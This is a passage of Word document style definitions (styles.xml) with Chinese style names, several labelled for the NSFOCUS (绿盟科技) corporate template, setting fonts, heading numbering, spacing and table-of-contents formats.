    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="124"/>
      </w:numPr>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D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
    <w:name w:val="标题 2 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="2"/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00050805"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="黑体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ParaCharCharCharChar">
    <w:name w:val="默认段落字体 Para Char Char Char Char"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="00D71AB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:tabs>
        <w:tab w:val="num" w:pos="2940"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:hanging="420"/>
    </w:pPr>
    <w:rPr>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1（绿盟科技）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00050805"/>
    <w:pPr>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="48" w:space="1" w:color="auto"/>
      </w:pBdr>
      <w:spacing w:before="600" w:after="330" w:line="576" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="文档结构图 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00D71AB4"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a2">
    <w:name w:val="表格题注"/>
    <w:next w:val="a3"/>
    <w:rsid w:val="00DD31AB"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:beforeLines="100" w:before="240"/>
      <w:ind w:left="1089" w:hanging="369"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a1">
    <w:name w:val="插图题注"/>
    <w:next w:val="a3"/>
    <w:rsid w:val="00DD31AB"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:afterLines="100" w:after="240"/>
      <w:ind w:left="1089" w:hanging="369"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="批注文字 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="a9"/>
    <w:next w:val="a9"/>
    <w:link w:val="Char1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
    <w:name w:val="批注主题 Char"/>
    <w:basedOn w:val="Char0"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ac">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="Char2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B93150"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
    <w:name w:val="批注框文本 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="ac"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00B93150"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="11">
    <w:name w:val="附录1（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="480" w:afterLines="100" w:after="100" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="21">
    <w:name w:val="附录2（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="32">
    <w:name w:val="附录3（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="附录4（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:qFormat/>
    <w:rsid w:val="00D402A3"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:beforeLines="50" w:before="50" w:afterLines="50" w:after="50" w:line="240" w:lineRule="atLeast"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:snapToGrid/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>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22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB1127"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1260"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:ind w:left="210" w:firstLine="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002E320E"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1050"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:spacing w:before="120"/>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="33">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009165FF"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="1680"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8290"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="42">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="630"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="50">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="840"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="60">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1050"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1260"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1470"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B258AD"/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="ad">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00EC6959"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ae">
    <w:name w:val="正文（绿盟科技）"/>
    <w:link w:val="Char3"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6959"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af">
    <w:name w:val="目录（绿盟科技）"/>
    <w:basedOn w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00EC6959"/>
    <w:pPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="黑体"/>
      <w:b/>
      <w:sz w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
    <w:name w:val="正文（绿盟科技） Char"/>
    <w:link w:val="ae"/>
    <w:rsid w:val="00EC6959"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af0">
    <w:name w:val="正文首行缩进（绿盟科技）"/>
    <w:basedOn w:val="ae"/>
    <w:link w:val="Char4"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:spacing w:after="50"/>
      <w:ind w:firstLineChars="200" w:firstLine="200"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2（绿盟科技）"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepLines/>
      <w:widowControl w:val="0"/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:spacing w:before="260" w:after="260" w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="31">
    <w:name w:val="标题 3（绿盟科技）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="005D6467"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
      </w:tabs>
      <w:spacing w:line="415" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs w:val="0"/>
      <w:snapToGrid/>
      <w:kern w:val="0"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="标题 4（绿盟科技）"/>
    <w:basedOn w:val="4"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:widowControl/>
      <w:numPr>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:after="156"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:bCs w:val="0"/>
      <w:snapToGrid/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="5">
    <w:name w:val="标题 5（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="280" w:after="156" w:line="377" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:snapToGrid/>
      <w:sz w:val="24"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="6">
    <w:name w:val="标题 6（有编号）（绿盟科技）"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="ae"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="240" w:after="64" w:line="319" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial"/>
      <w:b/>
      <w:snapToGrid/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a">
    <w:name w:val="插图标注（绿盟科技）"/>
    <w:next w:val="ae"/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="126"/>
      </w:numPr>
      <w:spacing w:after="156"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="a0">
    <w:name w:val="表格标注（绿盟科技）"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="ae"/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="7"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char4">
    <w:name w:val="正文首行缩进（绿盟科技） Char"/>
    <w:link w:val="af0"/>
    <w:rsid w:val="00153F11"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="x-none" w:eastAsia="x-none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00153F11"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:snapToGrid w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af1">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00153F11"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="1111110">
    <w:name w:val="Outline List 1"/>
    <w:aliases w:val="1 / 1.1 / 1.2.1(缩进)"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EA705F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="111111">
    <w:name w:val="Outline List 2"/>
    <w:aliases w:val="2.1.1"/>
    <w:basedOn w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000F6D15"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="af2">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0050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程序"/>
    <w:basedOn w:val="a3"/>
    <w:rsid w:val="002D0C0D"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
        <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
      </w:pBdr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:leftChars="200" w:left="200" w:rightChars="200" w:right="200" w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体"/>
      <w:snapToGrid/>
      <w:kern w:val="2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002F14FC"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:adjustRightInd/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLineChars="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
